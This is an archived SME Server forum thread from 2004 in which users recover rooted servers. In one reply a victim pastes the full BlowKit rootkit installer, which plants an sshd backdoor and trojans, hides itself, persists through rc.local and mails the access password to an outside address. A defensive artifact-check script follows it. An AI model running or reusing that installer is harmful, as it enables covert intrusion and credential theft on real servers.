Koozali.org: home of the SME Server

5.6 Hacked/Rooted, Trying to recover

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #30 on: April 09, 2004, 03:32:25 PM »
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV, and that's it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), and Gallery on another IBAY (pictures).


Would you let us know what versions of all the above you had on, including what version of PHP?

Thanks

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #31 on: April 11, 2004, 06:49:27 AM »
Quote from: "Anonymous"


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.


Actually, if you read this whole thread, you would realize that I had already documented that I was rooted. The box was not able to boot up, commands in single user mode did not function, and my root password was changed. I think this equates to being rooted.

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #32 on: April 11, 2004, 06:50:11 AM »
Quote from: "Anonymous"
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV, and that's it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), and Gallery on another IBAY (pictures).


Would you let us know what versions of all the above you had on, including what version of PHP?

Thanks


I really couldn't say. The box has been formatted completely, and I didn't track version numbers on these contribs. Sorry.

Brian

Brian

Re: Maybe it was Mambo that was hacked
« Reply #33 on: April 11, 2004, 06:51:05 AM »
Quote from: "stancol"
http://www.net-security.org/vuln.php?id=3337


I am decently sure that I was running 1.0.4, now all of my machines are running the newest 1.0.5. Although, I could be wrong, and this could be the source.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #34 on: April 11, 2004, 11:28:34 PM »
Thanks

stancol

Who gets the booby prize?
« Reply #35 on: April 13, 2004, 01:21:53 AM »
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50, I'm way too rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forums need a little humor; they've been getting way too serious.)
What are the three dots for at the end of my signature file and why can't I get rid of them? These three dots right here >...

Boris

5.6 Hacked/Rooted, Trying to recover
« Reply #36 on: April 13, 2004, 10:38:55 AM »
Brian,
If you feel like it, you could just donate your money to contribs.org to support this forum and hosting.
We all will benefit from it :-)
Just an option and no obligations.
...

stancol

Good Idea
« Reply #37 on: April 14, 2004, 05:09:23 AM »
Good idea, wish I'd thought of it, Boris. Oh well, at least my post was funnier than yours.

:hammer:
What are the three dots for at the end of my signature file and why can't I get rid of them? These three dots right here >...

Ralph

Another Idea
« Reply #38 on: April 15, 2004, 10:36:55 PM »
I think booting from a Knoppix CD, or installing the drive into another Red Hat box and copying the files, is a great idea. However, in the future you may want to try this:

1. Clone the drive using Norton Ghost or whatever suits your fancy.

2. Then, on the cloned drive, do an upgrade of the server; it will get you booted and give you access to MySQL and anything else, including LOGS! This has saved me many times.

3. It also allows you to scavenge what you had and try to find the hacker. I would like to know how you were rooted: were you running Post Nuke or any other forks of PHP Nuke (if so, what version)? There is a patch for the latest version of Post Nuke.

-Ralph

Anonymous

Re: Who gets the booby prize?
« Reply #39 on: April 19, 2004, 02:54:09 AM »
Quote from: "stancol"
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50, I'm way too rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forums need a little humor; they've been getting way too serious.)


I forgot about this. However, no one really "solved" my problem, just provided workarounds and ways to get the data, that I already knew and was trying. Regardless, I do appreciate everyone's help, so I am donating $25 to contribs! :)

Brian

Tom

Hacked System
« Reply #40 on: April 23, 2004, 08:52:22 PM »
I have had five 5.5 systems hacked and left in a state where the system would not start again.

On one of the systems I was able to view the files, and it seems all files were read-only. On the other servers the swap file was missing.

The systems had no other contribs loaded and were patched. I had remote access to them through SSL and that's all.

I have now upgraded all other sites to 6 and have had no more attacks. I would like to know how they got in.

Regards

Tom

iFX

What version should I upgrade to?
« Reply #41 on: June 19, 2004, 06:23:56 AM »
I was hacked by my own stupid fault... was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up finding a second temporary backup server etc...

How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some Promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a Windows user, not a real admin)...  I was then having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ

The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...

I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.

contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs).  Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!

DOH!  I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?

What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do...  Are the latest 6.0 updates all I'll need?

By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
#!/bin/bash

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU}  ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi

if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."

=====================

I don't really understand what that code above does... but maybe someone here can shed some light on it all ;)

Thanks for any advice you could give me.
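
The installer above drops a fixed set of files (/dev/.b as a marker, /usr/bin/.env, the replacement sshd /usr/sbin/hdaf4 with its config moved to /usr/bin/000023, the hiding list /usr/lib/.lib/libnh, /usr/bin/-bash, three start lines appended to /etc/rc.d/rc.local, and chattr +isa on all of them), so a disk examined from another box, as Ralph suggests above, can be checked for exactly those artifacts. The check below is an added example, not code from this thread or from SME Server; it assumes the suspect disk is mounted read-only at the path given as its argument.

```shell
#!/bin/sh
# Added example: look for the artifacts the posted BlowKit installer leaves behind.
# Argument: mount point of the suspect disk (mounted read-only from a rescue CD,
# as suggested in the thread). With no argument the live root is checked, which
# is less trustworthy because the kit replaces system binaries such as netstat.

blowkit_artifacts() {
    root="${1:-}"
    hits=0
    # Files the installer creates or moves into place (paths taken from the script).
    for p in /dev/.b /usr/bin/.env /usr/sbin/hdaf4 /usr/bin/000023 \
             /usr/lib/.lib /usr/lib/.lib/libnh /usr/lib/.lib/libne /usr/bin/-bash; do
        if [ -e "$root$p" ]; then
            echo "FOUND: $p"
            hits=$((hits + 1))
        fi
    done
    # Persistence: the three lines the installer appends to rc.local.
    rc="$root/etc/rc.d/rc.local"
    if [ -f "$rc" ] && grep -qE '^/usr/sbin/hdaf4|^\.env |^-bash ' "$rc"; then
        echo "FOUND: backdoor start lines in /etc/rc.d/rc.local"
        hits=$((hits + 1))
    fi
    # The installer sets chattr +isa on its files; a stock rc.local or netstat
    # carrying the immutable flag is another indicator (lsattr is optional here).
    if command -v lsattr >/dev/null 2>&1; then
        for p in /etc/rc.d/rc.local /bin/netstat; do
            f="$root$p"
            [ -f "$f" ] || continue
            flags=$(lsattr -d "$f" 2>/dev/null | cut -d' ' -f1)
            case "$flags" in
                *i*) echo "IMMUTABLE: $p"; hits=$((hits + 1)) ;;
            esac
        done
    fi
    # Exit status is the number of indicators seen (0 means none found).
    return "$hits"
}
```

Source the file and run `blowkit_artifacts /mnt/suspect`; the exit status is the number of indicators found, so a non-zero status means the disk should be treated as compromised and rebuilt rather than cleaned.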

iFX

Sorry...
« Reply #42 on: June 21, 2004, 06:15:27 AM »
Sorry, I'm an idiot... I didn't mean to post here - was supposed to go in the General area  :(

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #43 on: June 21, 2004, 09:51:28 PM »
Take the 6.0 ISO image as a seed to rsync the 6.0.1 one.

http://mirror.contribs.org/smeserver/contribs/dmay/mitel/howto/rsync-smeserver-5.6dev.iso-howto.html
It's for 5.6, but it's the same idea.

Ed

Anonymous

recovering drive
« Reply #44 on: June 22, 2004, 01:08:57 AM »
I am interested in how you restored your MySQL. I too have a drive that will not boot; it can't find /ext3 (or something). I have the drive in a Windows box and can read and pull data off of it. I just don't know how to add that data into the new install I have on a different box. Any ideas would be great!